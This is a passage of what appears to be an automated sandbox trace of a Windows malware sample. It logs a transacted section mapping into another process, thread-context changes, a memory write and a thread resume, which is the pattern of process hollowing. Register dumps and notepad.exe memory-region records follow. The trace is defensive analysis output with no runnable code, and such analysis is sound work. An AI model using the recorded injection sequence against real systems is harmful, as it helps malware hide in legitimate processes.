IoStatusBlock=0x19d364, Buffer=0x7ce760*, Length=0x28e00, ByteOffset=0x19d36c*=0, Key=0x0 | out: IoStatusBlock=0x19d364, Buffer=0x7ce760*) returned 0x0 [0174.972] NtCreateSection (in: SectionHandle=0x19d8a4, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x1e0 | out: SectionHandle=0x19d8a4*=0x1f0) returned 0x0 [0174.988] NtRollbackTransaction (TransactionHandle=0x1e4, Wait=1) returned 0x0 [0175.197] NtQuerySection (in: SectionHandle=0x1f0, SectionInformationClass=0x1, SectionInformation=0x19d334, Length=0x30, ResultLength=0x0 | out: SectionInformation=0x19d334, ResultLength=0x0) returned 0x0 [0175.197] NtClose (Handle=0x1e0) returned 0x0 [0175.197] NtClose (Handle=0x1e4) returned 0x0 [0175.197] NtMapViewOfSection (in: SectionHandle=0x1f0, ProcessHandle=0x1d8, BaseAddress=0x19d930*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19d8e0*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19d930*=0x400000, SectionOffset=0x0, ViewSize=0x19d8e0*=0x29000) returned 0x40000003 [0175.201] NtGetContextThread (in: ThreadHandle=0x1dc, Context=0x19d3ac | out: Context=0x19d3ac*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x3cd000, Edx=0x0, Ecx=0x0, Eax=0x4367cb, Ebp=0x0, Eip=0x77a08fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0175.204] NtSetContextThread (ThreadHandle=0x1dc, Context=0x19d3ac*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x3cd000, Edx=0x0, Ecx=0x0, Eax=0x41d470, Ebp=0x0, Eip=0x77a08fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0175.207] NtWriteVirtualMemory (in: ProcessHandle=0x1d8, BaseAddress=0x3cd008, Buffer=0x19d930*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x19d930*, NumberOfBytesWritten=0x0) returned 0x0 [0175.216] NtResumeThread (in: ThreadHandle=0x1dc, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0175.270] NtClose (Handle=0x1dc) returned 0x0 [0175.271] NtClose (Handle=0x1d8) returned 0x0 [0175.271] NtClose (Handle=0x1f0) returned 0x0 [0175.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19d8dc*=0x5d0000, RegionSize=0x19d89c, FreeType=0x8000) returned 0x0 [0175.271] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x2150000) returned 0x0 [0175.305] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x7ce760) returned 1 [0175.450] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 18 os_tid = 0xdf4 Thread: id = 21 os_tid = 0xe00 Process: id = "4" image_name = "notepad.exe" filename = "c:\\windows\\system32\\notepad.exe" page_root = "0x79fd9000" os_pid = "0xee8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1250" cmd_line = "\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 564 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 565 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 566 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 567 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 568 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 569 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 570 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 571 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 572 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 573 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 574 start_va = 0x7ff7c6df0000 end_va = 0x7ff7c6e30fff monitored = 0 entry_point = 0x7ff7c6e08ef0 region_type = mapped_file name = "notepad.exe" filename = "\\Windows\\System32\\notepad.exe" (normalized: "c:\\windows\\system32\\notepad.exe") Region: id = 575 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 586 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 587 start_va = 0x7ffb5ee60000 end_va = 0x7ffb5f047fff monitored = 0 entry_point = 0x7ffb5ee8ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 588 start_va = 0x7ffb60950000 end_va = 0x7ffb609fcfff monitored = 0 entry_point = 0x7ffb609681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 589 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 590 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 591 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 592 start_va = 0x7ffb60d00000 end_va = 0x7ffb60da6fff monitored = 0 entry_point = 0x7ffb60d158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 593 start_va = 0x7ffb60e10000 end_va = 0x7ffb60eacfff monitored = 0 entry_point = 0x7ffb60e178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 594 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 595 start_va = 0x7ffb61960000 end_va = 0x7ffb619bafff monitored = 0 entry_point = 0x7ffb619738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 596 start_va = 0x7ffb60830000 end_va = 0x7ffb6094bfff monitored = 0 entry_point = 0x7ffb608702b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 597 start_va = 0x7ffb61690000 end_va = 0x7ffb61815fff monitored = 0 entry_point = 0x7ffb616dffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 598 start_va = 0x7ffb60b10000 end_va = 0x7ffb60c65fff monitored = 0 entry_point = 0x7ffb60b1a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 599 start_va = 0x7ffb5f050000 end_va = 0x7ffb5f2ccfff monitored = 0 entry_point = 0x7ffb5f124970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 600 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 601 start_va = 0x7ffb5ebd0000 end_va = 0x7ffb5ec39fff monitored = 0 entry_point = 0x7ffb5ec06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id 